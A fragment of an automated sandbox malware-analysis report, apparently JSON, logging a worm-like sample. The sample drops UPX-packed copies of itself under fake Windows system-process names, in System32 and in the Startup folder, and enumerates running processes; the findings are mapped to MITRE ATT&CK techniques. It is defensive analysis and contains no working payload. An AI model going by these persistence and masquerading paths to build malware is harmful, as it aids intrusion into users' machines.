\"4k51k4.exe\" wrote 46735 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46925 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46800 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46710 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46867 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46770 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46832 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46835 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46805 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46908 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46979 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46969 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46678 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46820 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46668 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46828 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46865 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46925 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46955 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46814 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46895 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46777 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46873 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46814 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46759 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46827 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46803 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46812 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46844 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46920 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46790 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46822 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46775 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46810 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46882 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46953 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46807 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46996 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46843 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46963 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46781 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46716 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46779 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46777 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46817 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46805 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46795 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46902 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46947 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46816 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 47012 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00001600]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\4k51k4.exe]- [targetUID: 00000000-00001600]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00001600]\n \"CSRSS .exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\4k51k4.exe]- [targetUID: 00000000-00001600]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00001600]\n \"WINLOGON.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00001600]\n \"4K51K4.EXE.67A9C388.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00001600]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00001600]\n \"MrHelloween.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\MrHelloween.scr]- [targetUID: 00000000-00001600]\n \"IEXPLORER.EXE.67A9C38B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9DA9B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00001600]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00001600]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00001600]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00001600]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00001600]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00001600]\n \"IEXPLORER.EXE.67A9DB78.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00001600]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00001600]\n \"4K51K4.EXE.67A9DB2A.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00001600]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178\" has section name UPX1 with entropy \"7.85055163958\"\n \"services.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"shell.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"4k51k4.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"IExplorer.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"CSRSS .exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"New Folder.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"Data HAPUBWS.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"Empty.pif\" has section name UPX1 with entropy \"7.85055163958\"\n \"WINLOGON.EXE.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"CSRSS.EXE.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"SERVICES.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"4K51K4.EXE.67A9C388.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"SMSS.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"LSASS.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"MrHelloween.scr\" has section name UPX1 with entropy \"7.85055163958\"\n \"IEXPLORER.EXE.67A9C38B.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"4K51K4.EXE.67A9DA9B.bin\" has section name UPX1 with entropy \"7.85055163958\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FileTimeToLocalFileTime\" with parameter 30e5fef92b04ca01 & 0M (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FileTimeToLocalFileTime\" with parameter @m & 40d5b53b9c7bdb01 (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FileTimeToLocalFileTime\" with parameter 46b3a8e09b7bdb01 & 461b6d42a47bdb01 (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FileTimeToLocalFileTime\" with parameter _ & 6A (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FileTimeToLocalFileTime\" with parameter 06ef03519b7bdb01 & 0657c8b2a37bdb01 (UID: 00000000-00005240)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"Process32NextW with parameter 